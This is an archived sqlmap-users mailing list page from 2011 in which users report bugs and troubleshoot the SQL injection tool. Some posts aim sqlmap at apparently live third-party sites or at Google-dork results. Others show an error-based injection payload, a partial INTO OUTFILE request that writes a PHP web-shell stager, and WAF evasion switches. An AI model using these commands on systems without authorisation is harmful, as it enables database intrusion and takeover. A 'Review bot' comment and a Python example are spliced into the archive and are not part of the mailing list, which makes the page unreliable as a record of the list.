sqlmap-users Mailing List for sqlmap (Page 77)
From: rmillet <rmi...@gm...> - 2011-11-08 20:48:03

Hi,

I have some questions about the redirections in sqlmap.

The command I used with version sqlmap/1.0-dev (r4495):

./sqlmap.py -u 'http://192.168.1.42/redirect.php?url=http%3A%2F%2F127.0.0.1%2Fpage'

The page on redirect.php on 192.168.1.42 redirects with a 302 Location header to http://127.0.0.1/page

Is it possible to deactivate following of redirections?

When it follows the redirection, sqlmap connects to 127.0.0.1
- with the Referer set to "http://192.168.1.42", is it normal that it is not the original URL?
- with Host header set to "192.168.1.42", this is a bug as it must be "127.0.0.1"

Regards,

From: Bernardo D. A. G. <ber...@gm...> - 2011-11-08 13:58:20

Hi David,

On 8 November 2011 13:13, David Alvarez <dav...@gm...> wrote:
> ...
> The problem is that sqlmap is not able to detect differences because when
> sqlmap execute A) the value will be locked, so the following requests won't
> modify the results in the database, the item is locked, and all responses
> will be equal.
> To unlock the item, you have to execute another functionality. So, how does
> sqlmap deal in these situations?

What do you mean by "execute another functionality"? If you just need to perform a certain GET request, then fine, sqlmap can do it. Use switches:

--safe-url=SAFURL   Url address to visit frequently during testing
--safe-freq=SAFREQ  Test requests between two visits to a given safe url

Refer to the user's manual for details.

> A solution could be provide the unlock request and execute that functionality
> after every request made by sqlmap, in order to unlock the item and detect
> changes in the responses. However, this duplicates the number of requests
> needed.

At the moment --safe-url only supports a GET request, we can think of making it able to get the raw request from a text file instead so it would also support POST (like for -r).

Cheers,
Bernardo

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

From: David A. <dav...@gm...> - 2011-11-08 13:13:52

Hello,

I detected a simple sql injection in an update query. The vulnerable functionality locks items of a list. An example of the vulnerable parameter is:

A) vuln_param=1 AND 1=1
B) vuln_param=1 AND 1=0

The problem is that sqlmap is not able to detect differences because when sqlmap execute A) the value will be locked, so the following requests won't modify the results in the database, the item is locked, and all responses will be equal.

To unlock the item, you have to execute another functionality. So, how does sqlmap deal in these situations?

A solution could be provide the unlock request and execute that functionality after every request made by sqlmap, in order to unlock the item and detect changes in the responses. However, this duplicates the number of requests needed.

kr

From: Miroslav S. <mir...@gm...> - 2011-11-07 09:04:13

Hi Liang.

First of all please update to the latest v1.0-dev from our repository to have it up to date:

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Second of all, in those kind of cases, where you have connection timeouts FIRST THING you start the sqlmap, and you are absolutely sure that there are no proxy problems involved, switch --random-agent does miracles. There are WAFs that filter all HTTP traffic containing "sqlmap" as an HTTP "User-Agent" header and --random-agent masks that header value with some valid browser-like one.

Kind regards,
Miroslav Stampar

On Sun, Nov 6, 2011 at 4:32 AM, Liang Guo <lia...@me...> wrote:
>
> Hi sqlmap team
> this is a great tool, however, if i want to inject on sites that stop on the sql error, sqlmap got connection timed out error.
> is there a option i have to use or is it just a bug?
> Thanks you very much
> -----------------command--------------------------------------------
> ./sqlmap.py -u "http://www.hubbardbrook.org/gis/data.php?id=3"
> sqlmap/0.9 - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
> [*] starting at: 11:21:22
> [11:21:22] [INFO] using '/Users/Downloads/sqlmap/output/www.hubbardbrook.org/session' as session file
> [11:21:22] [INFO] testing connection to the target url
> [11:21:52] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> [11:22:23] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> [11:22:54] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> [11:23:25] [CRITICAL] connection timed out to the target url or proxy
>

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2011-11-06 08:47:12

Hi Choi.

It should be fixed with the latest commit.

Kind regards,
Miroslav Stampar

On Sat, Nov 5, 2011 at 3:06 AM, Choi Ho <cou...@gm...> wrote:
> The above error msg keep showing since a few days ago.
> Do you guys know what happened?
> Google changed their HTML searching things?
> Please advise me to solve the problem.
> Thanks.
> Regards,
>

--
Miroslav Stampar
http://about.me/stamparm

From: Liang G. <lia...@me...> - 2011-11-06 04:32:53

Hi sqlmap team

this is a great tool, however, if i want to inject on sites that stop on the sql error, sqlmap got connection timed out error.
is there a option i have to use or is it just a bug?

Thanks you very much

-----------------command--------------------------------------------
./sqlmap.py -u "http://www.hubbardbrook.org/gis/data.php?id=3"
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 11:21:22
[11:21:22] [INFO] using '/Users/Downloads/sqlmap/output/www.hubbardbrook.org/session' as session file
[11:21:22] [INFO] testing connection to the target url
[11:21:52] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:23] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:54] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:23:25] [CRITICAL] connection timed out to the target url or proxy

From: Choi Ho <cou...@gm...> - 2011-11-05 02:06:58

The above error msg keep showing since a few days ago.
Do you guys know what happened?
Google changed their HTML searching things?
Please advise me to solve the problem.

Thanks.
Regards,

From: Robin W. <ro...@di...> - 2011-11-03 13:40:34

I think I've found a bug in the os-shell command when specifying extra directories to try to upload a shell file to.

In this example I've told it the full document root is /opt/lampp/htdocs but I've made a directory in there called uploads which has full write permissions. I specify the uploads directory when asked for additional web server paths, giving it the full server path of /opt/lampp/htdocs/uploads.

Watching the traffic in Burp it first tries to upload to the root which fails, it then tries the uploads directory but when it checks to see if the file has been uploaded it checks for the temporary file in the vulnerabilities directory not the uploads directory. It then tries an upload to the vulnerabilities directory (it has previously detected this so I assume that is why it is trying it) and again fails but does try to check the right directory this time. I've attached a screenshot from Burp showing the hits.

Manually checking the uploads directory it hasn't managed to upload the file even though it should be able to as the directory is fully writable and the db is mysql running as root, I think this could be down to the query being sent across. I know the decoding here isn't quite right but it is adding the php to the wrong place in the query:

GET /vulner«ilities/sqli/?id= % LIMIT% 1% INTO% OUTFILE% %'%/opt%/lampp%/htdocs%/uploads%/tmpuzmzk.php%'% LINES% TERMINATí% BY% 0x<?php if (isset($_REQUEST["upload"])) { $dir=$_REQUEST["uploadDir"];

I'm doing all of this against DVWA with a manually created uploads directory.

Robin

sqlmap-dev $ ./sqlmap.py -c dvwa.conf --os-shell --proxy=http://localhost:8080

sqlmap/1.0-dev (r4488) - automatic SQL injection and database takeover tool
http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:42:06

[12:42:07] [INFO] using '/Users/robin/src/sqlmap-dev/output/192.168.56.101/session' as session file
[12:42:07] [INFO] resuming injection data from session file
[12:42:07] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[12:42:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=12 AND (SELECT 6722 FROM(SELECT COUNT(*),CONCAT(0x3a64657a3a,(SELECT (CASE WHEN (6722=6722) THEN 1 ELSE 0 END)),0x3a6a76633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
---
[12:42:09] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[12:42:09] [INFO] going to use a web backdoor for command prompt
[12:42:09] [INFO] fingerprinting the back-end DBMS operating system
[12:42:09] [INFO] the back-end DBMS operating system is Linux
[12:42:09] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[12:42:12] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]: /opt/lampp/htdocs
[12:42:19] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload the agent [Enter for None]: /opt/lampp/uploads/
[12:42:30] [INFO] heuristics detected web page charset 'ascii'
[12:42:33] [WARNING] unable to upload the file stager on '/opt/lampp/htdocs'
[12:42:36] [WARNING] unable to upload the file stager on '/opt/lampp/uploads'
[12:42:38] [WARNING] unable to upload the file stager on '/opt/lampp/htdocs/vulnerabilities'
[12:42:38] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 3 times
[12:42:38] [INFO] Fetched data logged to text files under '/Users/robin/src/sqlmap-dev/output/192.168.56.101'

[*] shutting down at 12:42:38

From: Miroslav S. <mir...@gm...> - 2011-10-27 10:38:21

sorry, I can see from the patch what's the problem at the first place :)

will apply the patch. thank you.

kind regards

On Thu, Oct 27, 2011 at 12:36 PM, Miroslav Stampar <mir...@gm...> wrote:
> Hi Alexander.
>
> The same thing you've done is problematic on Privoxy. We have to find
> some other way for fixing this.
>
> Kind regards
>
> On Thu, Oct 27, 2011 at 12:09 PM, Alexander Rigbo <al...@ri...> wrote:
>> Hello,
>>
>> Yesterday I encountered a bug in sqlmap. The tor port detection was broken due to this change in lib/core/settings.py:
>>
>> -DEFAULT_TOR_PORTS = (8118, 8123)
>> +DEFAULT_TOR_PORTS = (8123, 8118)
>>
>> The reason this broke it for me is because my polipo is running at port 8118, and the code that tries to connect to these ports does not properly reinitiate the socket used. See my attached patch.
>>
>> Best regards,
>> Alexander
>>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2011-10-27 10:36:25

Hi Alexander.

The same thing you've done is problematic on Privoxy. We have to find some other way for fixing this.

Kind regards

On Thu, Oct 27, 2011 at 12:09 PM, Alexander Rigbo <al...@ri...> wrote:
> Hello,
>
> Yesterday I encountered a bug in sqlmap. The tor port detection was broken due to this change in lib/core/settings.py:
>
> -DEFAULT_TOR_PORTS = (8118, 8123)
> +DEFAULT_TOR_PORTS = (8123, 8118)
>
> The reason this broke it for me is because my polipo is running at port 8118, and the code that tries to connect to these ports does not properly reinitiate the socket used. See my attached patch.
>
> Best regards,
> Alexander
>

--
Miroslav Stampar
http://about.me/stamparm

From: Alexander R. <al...@ri...> - 2011-10-27 10:31:48

Hello,

Yesterday I encountered a bug in sqlmap. The tor port detection was broken due to this change in lib/core/settings.py:

-DEFAULT_TOR_PORTS = (8118, 8123)
+DEFAULT_TOR_PORTS = (8123, 8118)

The reason this broke it for me is because my polipo is running at port 8118, and the code that tries to connect to these ports does not properly reinitiate the socket used. See my attached patch.

Best regards,
Alexander

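Review bot: the reordered tuple in DEFAULT_TOR_PORTS makes detection succeed or fail depending on which port is tried first, which the report traces to the probing code not reinitializing its socket between attempts. The order of the candidates should not matter, so the fix belongs in that connect loop (a new socket for each port); if 8123 is tried first on purpose, a comment on this line should say why.
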
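The failure described in this message, probing a list of candidate proxy ports with a socket that is not recreated between attempts, is avoided by the pattern in the following added example. It is not sqlmap's code and not the attached patch (which is not shown on this page); the function names and the constructed local listener are assumptions made for illustration.

```python
import socket

# Port order as quoted in the message above; used here only as sample input.
DEFAULT_TOR_PORTS = (8123, 8118)


def find_listening_port(ports, host="127.0.0.1", timeout=1.0):
    """Return the first port in `ports` that accepts a TCP connection, else None.

    A new socket is created for every attempt. After a failed connect() the
    state of the socket is unspecified by POSIX, and on some platforms a
    second connect() on the same socket fails even if the next port is
    listening, which makes the result depend on the order of `ports`.
    """
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            return port
        except OSError:
            # Refused or timed out: move on to the next candidate.
            continue
        finally:
            # Always release the socket, whether or not the connect worked.
            sock.close()
    return None


def demo_order_independence():
    """Probe a constructed (closed, open) port pair in both orders."""
    # Constructed setup: one local listener on an ephemeral port.
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]

    # Reserve a second ephemeral port and release it so nothing listens there.
    placeholder = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    placeholder.bind(("127.0.0.1", 0))
    closed_port = placeholder.getsockname()[1]
    placeholder.close()

    try:
        closed_first = find_listening_port((closed_port, open_port))
        open_first = find_listening_port((open_port, closed_port))
        nothing = find_listening_port((closed_port,))
    finally:
        listener.close()
    return open_port, closed_first, open_first, nothing


if __name__ == "__main__":
    port, closed_first, open_first, nothing = demo_order_independence()
    print("listener on", port)
    print("closed port tried first ->", closed_first)
    print("open port tried first   ->", open_first)
    print("no listener at all      ->", nothing)
```
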
From: yarolinux b. | t. <yar...@gm...> - 2011-10-20 08:07:35

[03:04:51] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 1 times

[03:04:51] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4009), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4009)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py -u **************************************************************************** --dbs --random-agent --tor
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/pentest/database/sqlmap/lib/controller/controller.py", line 447, in start
    injection = checkSqlInjection(place, parameter, value)
  File "/pentest/database/sqlmap/lib/controller/checks.py", line 324, in checkSqlInjection
    _ = Request.queryPage(genCmpPayload(), place, raise404=False)
  File "/pentest/database/sqlmap/lib/request/connect.py", line 603, in queryPage
    page = removeReflectiveValues(page, payload)
  File "/pentest/database/sqlmap/lib/core/common.py", line 2514, in removeReflectiveValues
    if regex.split(REFLECTED_NON_ALPHA_NUM_REGEX)[0].lower() in content.lower(): # fast optimization check
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 324: ordinal not in range(128)

[*] shutting down at: 03:04:51

From: Miroslav S. <mir...@gm...> - 2011-10-19 21:27:27

Hi.

Thank you for your report. It should be fixed with the latest commit.

There is a possibility that you'll need to report that original exception causing problem - in that case please contact me privately.

Kind regards

On Wed, Oct 19, 2011 at 5:52 PM, Soma Cruz <ole...@gm...> wrote:
> [INFO] 972/4352 links visited (22%)
> [19:50:08] [ERROR] thread MainThread: unhandled exception in sqlmap/1.0-dev (r4407), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4407)
> Python version: 2.7.1
> Operating system: posix
> Command line: ./sqlmap.py --tor -u **************** --crawl=5 --dbms=mysql --sql-shell --batch
> Technique: None
> Back-end DBMS: MySQL (identified)
>
> [19:50:08] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4407), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4407)
> Python version: 2.7.1
> Operating system: posix
> Command line: ./sqlmap.py --tor -u **************** --crawl=5 --dbms=mysql --sql-shell --batch
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "/home/0x90/PycharmProjects/Laary/_sqlmap.py", line 77, in main
>     init(cmdLineOptions)
>   File "/home/0x90/PycharmProjects/Laary/lib/core/option.py", line 1877, in init
>     __setCrawler()
>   File "/home/0x90/PycharmProjects/Laary/lib/core/option.py", line 424, in __setCrawler
>     crawler.getTargetUrls()
>   File "/home/0x90/PycharmProjects/Laary/lib/utils/crawler.py", line 114, in getTargetUrls
>     runThreads(numThreads, crawlThread)
>   File "/home/0x90/PycharmProjects/Laary/lib/core/threads.py", line 167, in runThreads
>     traceback.print_exc()
> NameError: global name 'traceback' is not defined
> [*] shutting down at 19:50:09
>

--
Miroslav Stampar
http://about.me/stamparm

From: Soma C. <ole...@gm...> - 2011-10-19 15:52:51

[INFO] 972/4352 links visited (22%)
[19:50:08] [ERROR] thread MainThread: unhandled exception in sqlmap/1.0-dev (r4407), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4407)
Python version: 2.7.1
Operating system: posix
Command line: ./sqlmap.py --tor -u **************** --crawl=5 --dbms=mysql --sql-shell --batch
Technique: None
Back-end DBMS: MySQL (identified)

[19:50:08] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4407), retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4407)
Python version: 2.7.1
Operating system: posix
Command line: ./sqlmap.py --tor -u **************** --crawl=5 --dbms=mysql --sql-shell --batch
Technique: None
Back-end DBMS: MySQL (identified)
Traceback (most recent call last):
  File "/home/0x90/PycharmProjects/Laary/_sqlmap.py", line 77, in main
    init(cmdLineOptions)
  File "/home/0x90/PycharmProjects/Laary/lib/core/option.py", line 1877, in init
    __setCrawler()
  File "/home/0x90/PycharmProjects/Laary/lib/core/option.py", line 424, in __setCrawler
    crawler.getTargetUrls()
  File "/home/0x90/PycharmProjects/Laary/lib/utils/crawler.py", line 114, in getTargetUrls
    runThreads(numThreads, crawlThread)
  File "/home/0x90/PycharmProjects/Laary/lib/core/threads.py", line 167, in runThreads
    traceback.print_exc()
NameError: global name 'traceback' is not defined
[*] shutting down at 19:50:09

From: Miroslav S. <mir...@gm...> - 2011-10-16 11:13:03

Hi.

Please checkout latest v1.0-dev from our SVN repository to have it fixed.

Kind regards,
Miroslav Stampar

On Oct 16, 2011 12:51 PM, "Rafael Tavares" <jr...@gm...> wrote:
> Hi,
>
> I'm testing sqlmap in ubuntu 10.04, I've got the following error while
> doing google search, What could be causing it?
>
> [21:45:39] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9 (r3630)
> Python version: 2.7.1+
> Operating system: posix
> Command line: ./sqlmap.py -g inurl:produto.php?id= --dbs -v 2
> Technique: BOOLEAN
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 82, in main
>     start()
>   File "/home/dextervip/sqlmap/lib/controller/controller.py", line 447, in start
>     action()
>   File "/home/dextervip/sqlmap/lib/controller/action.py", line 88, in action
>     conf.dumper.dbs(conf.dbmsHandler.getDbs())
>   File "/home/dextervip/sqlmap/plugins/generic/enumeration.py", line 704, in getDbs
>     indexRange = getRange(count, plusOne=plusOne)
>   File "/home/dextervip/sqlmap/lib/core/common.py", line 1072, in getRange
>     indexRange = range(limitStart - 1, limitStop)
> OverflowError: range() result has too many items
>
> [*] shutting down at: 21:45:39
>

From: Rafael T. <jr...@gm...> - 2011-10-15 01:08:58

Hi,

I'm testing sqlmap in ubuntu 10.04, I've got the following error while doing google search, What could be causing it?

[21:45:39] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 0.9 (r3630)
Python version: 2.7.1+
Operating system: posix
Command line: ./sqlmap.py -g inurl:produto.php?id= --dbs -v 2
Technique: BOOLEAN
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 82, in main
    start()
  File "/home/dextervip/sqlmap/lib/controller/controller.py", line 447, in start
    action()
  File "/home/dextervip/sqlmap/lib/controller/action.py", line 88, in action
    conf.dumper.dbs(conf.dbmsHandler.getDbs())
  File "/home/dextervip/sqlmap/plugins/generic/enumeration.py", line 704, in getDbs
    indexRange = getRange(count, plusOne=plusOne)
  File "/home/dextervip/sqlmap/lib/core/common.py", line 1072, in getRange
    indexRange = range(limitStart - 1, limitStop)
OverflowError: range() result has too many items

[*] shutting down at: 21:45:39

From: Vinícius K-M. <vin...@gm...> - 2011-10-09 19:25:55

Ignacio and Miroslav, thank you guys!

On 8 October 2011 10:04, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> You can use --tamper=randomcase for your case.
>
> Kind regards,
> Miroslav Stampar
> On 8.10.2011. 12:37, "Vinícius K-Max" <vin...@gm...> wrote:
>

--
Vinícius

From: Miroslav S. <mir...@gm...> - 2011-10-09 07:34:39

hi.

this should be fixed some week(s) ago. could you please confirm that you run up to date revision (svn update)?

kind regards

On Sun, Oct 9, 2011 at 12:02 AM, d33 d33 <d3...@gm...> wrote:
> I get the message "500 (Internal Server Error) - 1 times"
> whenever I try to run the SqlMap, which could be this error?
>
> [18:32:59] [INFO] testing connection to the target url
> [18:33:02] [INFO] testing if the url is stable, wait a few seconds
> [18:33:05] [INFO] url is stable
> [18:33:05] [INFO] testing if GET parameter 'id' is dynamic
> [18:33:08] [INFO] confirming that GET parameter 'id' is dynamic
> [18:33:11] [INFO] GET parameter 'id' is dynamic
> [18:33:12] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
> [18:33:12] [INFO] testing sql injection on GET parameter 'id'
> [18:33:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [18:33:43] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> [18:33:43] [CRITICAL] unable to access item 'previousMethod'
> [18:33:43] [WARNING] HTTP error codes detected during testing:
> 500 (Internal Server Error) - 1 times
>
> [*] shutting down at: 18:33:43
>

--
Miroslav Stampar
http://about.me/stamparm

From: Sherif El-D. <arc...@gm...> - 2011-10-09 04:07:40

This is how you should do it:

1- login to CAS with valid credentials using your browser.
2- after successful login, get your session cookie "use any proxy, Firebug, or any other way"
3- after that, run sqlmap using the "--cookie=COOKIE", it will work :)

Sherif Eldeeb

On Sat, Oct 8, 2011 at 10:18 AM, Metin Emenullahi <me...@mt...> wrote:
> Hi there,
>
> I have a problem with CAS. I have a website which has several applications
> based on CAS and I want to do some SqlInjection tests in order to close
> holes in the system as much as possible. But because of the ticket system of
> CAS, I couldn't pass the login screen with SQLMap. How can I login to the
> site, by providing username and password via SQLMap?
>
> Thanks in advance.
>
> --
>
> -- o --
> Metin Emenullahi
> IEEE METU Student Branch
> System Administrator
>

From: d33 d. <d3...@gm...> - 2011-10-08 22:02:40

I get the message "500 (Internal Server Error) - 1 times" whenever I try to run the SqlMap, which could be this error?

[18:32:59] [INFO] testing connection to the target url
[18:33:02] [INFO] testing if the url is stable, wait a few seconds
[18:33:05] [INFO] url is stable
[18:33:05] [INFO] testing if GET parameter 'id' is dynamic
[18:33:08] [INFO] confirming that GET parameter 'id' is dynamic
[18:33:11] [INFO] GET parameter 'id' is dynamic
[18:33:12] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[18:33:12] [INFO] testing sql injection on GET parameter 'id'
[18:33:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:33:43] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[18:33:43] [CRITICAL] unable to access item 'previousMethod'
[18:33:43] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1 times

[*] shutting down at: 18:33:43

From: Miroslav S. <mir...@gm...> - 2011-10-08 13:11:11

Hi.

Is there a possibility to send sample log file you've used so I could take a look what's going on?

Kind regards

On 7.10.2011. 11:22, "Paule Puhmann" <ko...@gm...> wrote:
> Hello list!
>
> First off: Thanks for the great tool!
>
> I'm trying to run sqlmap on a multipart/form-data POST request which I'm
> passing to the tool with the '-l' option. I was using the 0.9 packaged
> version, which didn't work at all, then checked out yesterdays dev-version
> and retried. This time sqlmap ran its tests against the request's first
> parameter and then stopped, stating that no parameter is injectable.
>
> Is it currently supported to inject multipart POST requests and I'm doing
> something wrong, or is this a bug? Thanks in advance!
>
> Cheers,
> Dennis
>

From: Miroslav S. <mir...@gm...> - 2011-10-08 13:04:57

Hi.

You can use --tamper=randomcase for your case.

Kind regards,
Miroslav Stampar

On 8.10.2011. 12:37, "Vinícius K-Max" <vin...@gm...> wrote:

From: Ignacio H. <nac...@gm...> - 2011-10-08 10:42:11

You can use a tamper. Check the tampers folder. You can create your own one to achieve that if there isn't one for it.

On 08/10/2011 12:37, "Vinícius K-Max" <vin...@gm...> wrote:
> hello
>
> I can manually bypass a WAF/filter with this trick: uNiOn aLl sElEcT...
> and so on.
>
> Is there an option like this in sqlmap?
>
> Thanks!
>
> --
> Vinícius
>

From: Vinícius K-M. <vin...@gm...> - 2011-10-08 10:37:26

hello

I can manually bypass a WAF/filter with this trick: uNiOn aLl sElEcT... and so on.

Is there an option like this in sqlmap?

Thanks!

--
Vinícius

From: Metin E. <me...@mt...> - 2011-10-08 07:49:37

Hi there,

I have a problem with CAS. I have a website which has several applications based on CAS and I want to do some SqlInjection tests in order to close holes in the system as much as possible. But because of the ticket system of CAS, I couldn't pass the login screen with SQLMap. How can I login to the site, by providing username and password via SQLMap?

Thanks in advance.

--

-- o --
Metin Emenullahi
IEEE METU Student Branch
System Administrator